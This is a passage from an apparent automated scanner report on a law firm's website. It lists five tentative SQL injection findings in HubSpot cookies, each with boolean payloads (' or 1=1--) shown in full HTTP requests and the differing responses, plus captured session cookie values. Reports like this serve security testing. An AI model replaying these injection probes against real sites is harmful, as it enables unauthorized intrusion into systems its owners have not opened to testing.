<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.93. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotdt cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 13645990'%20or%201%3d1--%20 and 13645990'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A4113645990'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Wed, 12-May-2010 16:10:57 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A4113645990'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:10:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.94. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotutk cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 74646296'%20or%201%3d1--%20 and 74646296'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee574646296'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Wed, 12-May-2010 16:11:03 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee574646296'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.95. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvd cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 73864364'%20or%201%3d1--%20 and 73864364'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee573864364'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Wed, 12-May-2010 16:11:09 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee573864364'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.96. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvm cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 16119179'%20or%201%3d1--%20 and 16119179'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee516119179'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Wed, 12-May-2010 16:11:22 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee516119179'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.97. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvw cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 15646355'%20or%201%3d1--%20 and 15646355'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee515646355'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Wed, 12-May-2010 16:11:16 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee515646355'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
